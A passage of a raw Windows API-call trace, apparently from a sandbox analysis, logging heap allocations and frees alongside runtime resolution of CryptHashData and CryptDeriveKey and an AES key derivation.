hHeap=0x8a0000) returned 1 [0161.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0161.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0161.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0161.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0161.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0161.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0161.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0161.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.117] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0161.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0161.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0161.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0161.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0161.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0161.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0161.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0161.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0161.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0161.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0161.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0161.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0161.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0161.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0161.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0161.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0161.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0161.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0161.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x9bd468, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0161.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0161.117] GetProcAddress (hModule=0x74f20000, lpProcName="CryptHashData") returned 0x74f2df36 [0161.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0161.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0161.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0161.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0161.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0161.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0161.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0161.118] CryptHashData (hHash=0x90af58, pbData=0x8ded80, dwDataLen=0x19, dwFlags=0x1) returned 1 [0161.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0161.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0161.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0161.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0161.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0161.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0161.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0161.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0161.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0161.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0161.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0161.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0161.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0161.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0161.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0161.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0161.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0161.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0161.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0161.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0161.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0161.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0161.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0161.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0161.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0161.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0161.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0161.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0161.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0161.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0161.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0161.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0161.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0161.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0161.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0161.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0161.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0161.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0161.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0161.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0161.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0161.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0161.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0161.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0161.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0161.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0161.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0161.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0161.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0161.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0161.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0161.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0161.119] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0161.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0161.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0161.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0161.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0161.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0161.120] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0161.120] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.120] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0161.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0161.120] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0161.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0161.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0161.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0161.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0161.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0161.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0161.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0161.126] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0161.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0161.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0161.126] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0161.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0161.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0161.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0161.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0161.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0161.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0161.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0161.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0161.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0161.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0161.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0161.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0161.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0161.126] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0161.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0161.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0161.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0161.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0161.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0161.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0161.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0161.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0161.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0161.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0161.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0161.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0161.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0161.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0161.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0161.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0161.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0161.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0161.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0161.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0161.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0161.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x9bd588, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0161.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0161.128] GetProcAddress (hModule=0x74f20000, lpProcName="CryptDeriveKey") returned 0x74f63188 [0161.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0161.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0161.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0161.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0161.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0161.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0161.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0161.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0161.128] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0161.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0161.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0161.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0161.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0161.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0161.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0161.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0161.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0161.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0161.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0161.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0161.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0161.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0161.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0161.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0161.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0161.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0161.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0161.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0161.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0161.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0161.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0161.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0161.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0161.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0161.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0161.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0161.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0161.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0161.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0161.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0161.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0161.129] 